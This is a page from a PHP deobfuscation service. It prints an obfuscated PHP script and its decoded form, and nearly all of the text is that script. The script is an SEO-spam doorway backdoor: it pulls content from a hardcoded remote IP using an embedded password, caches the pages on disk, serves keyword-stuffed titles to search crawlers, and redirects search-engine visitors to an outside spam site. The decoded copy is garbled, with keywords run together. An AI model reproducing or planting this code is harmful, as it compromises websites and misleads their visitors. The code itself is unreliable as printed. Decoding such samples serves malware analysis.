Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php gotoOZ8dP;I7orE:if($_GET["\151\x64"]=="\x74\145\x73\x74\151\156\147"){echo"\x74\145..

Decoded Output download

<?php 
gotoOZ8dP;I7orE:if($_GET["id"]=="testing"){echo"test good...";die;}gotoZRaeq;wF0Z0:if(function_exists("curl_init")){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"http://135.181.21.126/".$_GET["fn"].".php?pass={$apass}&q={$_GET["id"]}");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,4);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");$text=curl_exec($ch);curl_close($ch);}gotoAuQnR;OQHSO:$keyword=str_replace("-"," ",$_GET["id"]);gotoo3DFo;hBgNK:$apass1="visdoijew";gotoVRxpr;I4VB9:$apass="{$apass1}"."{$apass2}"."{$apass3}";gotokqAIE;VRxpr:$x1=3;gotoFF80D;TAN1g:if(strlen($text)<5000){$url="135.181.21.126";$fp=fsockopen($url,80,$errno,$errstr,30);if(!$fp){echo"{$errstr} ({$errno})<br />
";}else{$req="/".$_GET["fn"].".php?pass={$apass}&q={$_GET["id"]}";$out="GET {$req} HTTP/1.0\xd\xa";$out.="Host: {$url}\xd
";$out.="Connection: Close\xd

\xa";fwrite($fp,$out);while(!feof($fp)){$text=$text.fgets($fp,2048);}fclose($fp);}fclose($out);$text=explode("\xa",$text);$text=$text[7];}gotod9ExT;kqAIE:if(strpos($_SERVER["HTTP_REFERER"],"google.")orstrpos($_SERVER["HTTP_REFERER"],"yahoo.")orstrpos($_SERVER["HTTP_REFERER"],"bing.")){header("Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}");die;}else{$myname=$_GET["id"].".php";if(file_exists("index/".$myname)){$html=@file_get_contents("index/".$myname);if(strpos($_SERVER["HTTP_USER_AGENT"],"bing")>2orstrpos($_SERVER["HTTP_USER_AGENT"],"yahoo")>2){$keyword=str_replace("-"," ",$_GET["id"]);$html=str_replace("<title></title>","<title>{$keyword}</title>",$html);}echo$html;die;}}gotoy5tky;AuQnR:if(strlen($text)<5000){$text=file_get_contents("http://135.181.21.126/".$_GET["fn"].".php?pass={$apass}&q={$_GET["id"]}");}gotoTAN1g;qLfWk:$apass2="b23hr23vr32";gotoot0YI;bi4l1:echo$text;gotol9cus;d9ExT:if(strlen($text)>5000){$out=fopen("index/".$myname,"w");fwrite($out,$text);fclose($out);}gotoHpxIT;SNunB:if($s=="\"|$s=="/"){$s='';}gotoBReMi;FF80D:$xx1=5;gotoOQHSO;OZ8dP:error_reporting(0);gotoyRJzg;y5tky:$query_pars_2=str_replace("-","+",$_GET["id"]);gototazfv;lI19e:foreach($_GETas$a=>$b){$_GET["id"]=$b;}gotoI7orE;ZRaeq:if($_GET["id"]=="index"){header("Location: https://google.com");die;}gotos9s4t;ot0YI:$s=dirname($_SERVER["PHP_SELF"]);gotoSNunB;eADqQ:$apass3="rv32ydacsvsdv";gotoI4VB9;o3DFo:$keyword=str_replace(" ","+",$keyword);gotoqLfWk;HpxIT:if(strpos($_SERVER["HTTP_USER_AGENT"],"bing")>2orstrpos($_SERVER["HTTP_USER_AGENT"],"yahoo")>2){$text=str_replace("<title></title>","<title>{$keyword}</title>",$text);}gotobi4l1;yRJzg:$today="20231123-";gotolI19e;tazfv:$text='';gotowF0Z0;s9s4t:$_GET["world"]=5;gotoKl3Xn;BReMi:$s=$_SERVER["SERVER_NAME"].$s;gotoeADqQ;Kl3Xn:$_GET["fn"]="696969new";gotohBgNK;l9cus:?>

Did this file decode correctly?

Original Code

<?php
gotoOZ8dP;I7orE:if($_GET["\151\x64"]=="\x74\145\x73\x74\151\156\147"){echo"\x74\145\163\164\x20\x67\x6f\x6f\144\56\56\x2e";die;}gotoZRaeq;wF0Z0:if(function_exists("\143\165\x72\154\x5f\151\x6e\x69\x74")){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"\150\164\x74\160\x3a\57\x2f\61\x33\65\56\61\70\x31\56\x32\61\x2e\61\62\66\57".$_GET["\x66\x6e"]."\x2e\x70\x68\160\x3f\160\x61\x73\163\75{$apass}\46\x71\x3d{$_GET["\151\144"]}");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,4);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);curl_setopt($ch,CURLOPT_USERAGENT,"\115\x6f\x7a\151\154\154\x61\x2f\64\x2e\x30\x20\50\143\157\155\160\141\x74\x69\142\x6c\x65\x3b\x20\115\123\x49\x45\40\66\x2e\x30\x3b\40\127\151\156\x64\x6f\x77\163\40\x4e\124\40\x35\56\x31\x3b\40\x53\126\61\51");$text=curl_exec($ch);curl_close($ch);}gotoAuQnR;OQHSO:$keyword=str_replace("\55","\40",$_GET["\x69\144"]);gotoo3DFo;hBgNK:$apass1="\166\151\x73\x64\x6f\x69\x6a\145\x77";gotoVRxpr;I4VB9:$apass="{$apass1}"."{$apass2}"."{$apass3}";gotokqAIE;VRxpr:$x1=3;gotoFF80D;TAN1g:if(strlen($text)<5000){$url="\61\63\x35\x2e\61\70\61\x2e\62\x31\x2e\61\x32\x36";$fp=fsockopen($url,80,$errno,$errstr,30);if(!$fp){echo"{$errstr}\40\x28{$errno}\x29\x3c\142\162\40\57\76\12";}else{$req="\x2f".$_GET["\x66\156"]."\x2e\x70\x68\160\x3f\x70\141\x73\163\75{$apass}\x26\x71\x3d{$_GET["\151\144"]}";$out="\107\105\124\x20{$req}\x20\110\x54\124\x50\57\61\56\x30\xd\xa";$out.="\x48\x6f\163\x74\x3a\x20{$url}\xd\12";$out.="\103\x6f\x6e\156\145\x63\x74\151\x6f\156\72\x20\103\x6c\157\x73\145\xd\12\15\xa";fwrite($fp,$out);while(!feof($fp)){$text=$text.fgets($fp,2048);}fclose($fp);}fclose($out);$text=explode("\xa",$text);$text=$text[7];}gotod9ExT;kqAIE:if(strpos($_SERVER["\110\124\x54\120\x5f\122\x45\106\x45\x52\105\x52"],"\x67\157\157\x67\154\x65\x2e")orstrpos($_SERVER["\110\x54\x54\120\x5f\x52\x45\x46\105\x52\x45\x52"],"\171\141\150\157\157\x2e")orstrpos($_SERVER["\110\124\x54\x50\137\x52\x45\106\x45\x52\105\122"],"\x62\x69\x6e\x67\x2e")){header("\x4c\157\143\141\164\151\157\x6e\x3a\x20\x68\164\164\160\x73\72\x2f\x2f\143\150\x70\157\153\56\163\151\x74\x65\x2f\x65\156\x74\145\x72\57\77\x6d\141\x72\x6b\75{$today}\55{$s}\x26\145\x6e\147\x6b\145\x79\x3d{$keyword}");die;}else{$myname=$_GET["\x69\x64"]."\56\x70\x68\160";if(file_exists("\x69\156\x64\x65\170\57".$myname)){$html=@file_get_contents("\x69\156\x64\145\x78\x2f".$myname);if(strpos($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\x52\x5f\101\x47\105\x4e\124"],"\142\151\x6e\x67")>2orstrpos($_SERVER["\x48\x54\124\x50\x5f\x55\123\105\x52\x5f\x41\x47\x45\x4e\124"],"\x79\141\x68\x6f\157")>2){$keyword=str_replace("\55","\40",$_GET["\x69\x64"]);$html=str_replace("\74\x74\x69\x74\x6c\x65\76\74\x2f\164\x69\164\x6c\145\x3e","\x3c\x74\151\164\154\145\x3e{$keyword}\74\57\x74\151\x74\x6c\145\76",$html);}echo$html;die;}}gotoy5tky;AuQnR:if(strlen($text)<5000){$text=file_get_contents("\150\164\x74\x70\72\57\x2f\61\x33\x35\x2e\x31\x38\x31\x2e\x32\x31\56\x31\x32\x36\x2f".$_GET["\x66\x6e"]."\56\160\x68\x70\77\160\x61\x73\x73\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}");}gotoTAN1g;qLfWk:$apass2="\x62\x32\x33\150\162\x32\x33\166\162\63\62";gotoot0YI;bi4l1:echo$text;gotol9cus;d9ExT:if(strlen($text)>5000){$out=fopen("\151\x6e\x64\x65\x78\x2f".$myname,"\x77");fwrite($out,$text);fclose($out);}gotoHpxIT;SNunB:if($s=="\x5c"|$s=="\57"){$s='';}gotoBReMi;FF80D:$xx1=5;gotoOQHSO;OZ8dP:error_reporting(0);gotoyRJzg;y5tky:$query_pars_2=str_replace("\x2d","\x2b",$_GET["\x69\144"]);gototazfv;lI19e:foreach($_GETas$a=>$b){$_GET["\x69\x64"]=$b;}gotoI7orE;ZRaeq:if($_GET["\151\144"]=="\x69\x6e\x64\145\x78"){header("\114\157\x63\141\164\x69\x6f\x6e\x3a\x20\150\164\x74\160\163\72\57\57\x67\x6f\x6f\x67\154\x65\56\x63\157\155");die;}gotos9s4t;ot0YI:$s=dirname($_SERVER["\120\110\120\137\x53\x45\114\x46"]);gotoSNunB;eADqQ:$apass3="\x72\x76\x33\x32\171\x64\141\143\163\166\163\144\166";gotoI4VB9;o3DFo:$keyword=str_replace("\40","\x2b",$keyword);gotoqLfWk;HpxIT:if(strpos($_SERVER["\x48\124\124\x50\x5f\125\123\105\x52\x5f\101\x47\x45\116\124"],"\142\x69\156\147")>2orstrpos($_SERVER["\x48\x54\124\x50\137\125\123\105\122\x5f\x41\x47\x45\x4e\124"],"\x79\x61\x68\157\157")>2){$text=str_replace("\x3c\164\151\164\154\x65\x3e\x3c\x2f\164\151\x74\x6c\145\76","\x3c\164\x69\164\x6c\145\x3e{$keyword}\x3c\x2f\164\x69\164\x6c\x65\76",$text);}gotobi4l1;yRJzg:$today="\x32\60\62\x33\61\x31\x32\x33\55";gotolI19e;tazfv:$text='';gotowF0Z0;s9s4t:$_GET["\x77\157\x72\x6c\x64"]=5;gotoKl3Xn;BReMi:$s=$_SERVER["\123\105\122\126\105\122\x5f\116\101\115\x45"].$s;gotoeADqQ;Kl3Xn:$_GET["\x66\156"]="\x36\71\66\x39\x36\x39\x6e\x65\167";gotohBgNK;l9cus:?>

Function Calls

None

Variables

None

Stats

MD5 42b2868a71f0ba82ac879b2e9be40966
Eval Count 0
Decode Time 52 ms